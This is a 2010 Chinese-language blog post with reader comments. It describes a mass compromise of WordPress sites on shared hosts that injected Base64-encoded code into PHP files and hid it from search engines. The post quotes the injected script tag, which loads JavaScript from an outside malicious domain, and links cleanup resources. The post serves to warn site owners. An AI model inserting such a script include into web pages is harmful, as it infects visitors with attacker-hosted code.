前几日我的Blog遭人挂马,所幸当日晚上就被发现然后被我清除,当时以为是Blog插件、主题有漏洞,一番检查后确定没有问题,但是原因未知。今天凌晨再次遭到挂马。Google后得知,这已经是针对GoDaddy、DreamHost等主机商某bug的第N轮入侵了WordPress用户大面积中招。第一次入侵发生在5月1日。
这次入侵典型的症状是所有PHP文件被植入一段Base64加密代码,导致网站各个页面下方挂有累死的恶意代码:
入侵者的高明之处在于,Base64加密代码(解密后是一段JS)在检测到来自搜索引擎的流量时,是不会执行的,这样就保证被挂马的网站不会被搜索引擎屏蔽,并不会有任何提示。有关该恶意脚本的详情可参考http://sucuri.net/malware/entry/MW:MROBH:1。
建议使用国外空间、并使用PHP的Blog立即检查是否被侵。
这次入侵典型的症状是所有PHP文件被植入一段Base64加密代码,导致网站各个页面下方挂有累死的恶意代码:
<script src="http://holasionweb.com/oo.php"></script>
入侵者的高明之处在于,Base64加密代码(解密后是一段JS)在检测到来自搜索引擎的流量时,是不会执行的,这样就保证被挂马的网站不会被搜索引擎屏蔽,并不会有任何提示。有关该恶意脚本的详情可参考http://sucuri.net/malware/entry/MW:MROBH:1。
建议使用国外空间、并使用PHP的Blog立即检查是否被侵。
网友评论(4):
tcsky
2010/05/23 21:35
怎样去除呀
子猴
2010/05/14 11:51
问题是如何解决这个问题,现在好像没有见到
Qizhi 回复于 2010/05/14 12:11
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html 或者自己写脚本替换即可
davidw
2010/05/14 10:46
怎么去掉这段万恶的代码呢?我的博客也中招了!直接删除是没有任何效果的。
sswv
2010/05/14 01:56
我遇到的情况和你描述的一致。
分页: 1/1 
1 
1
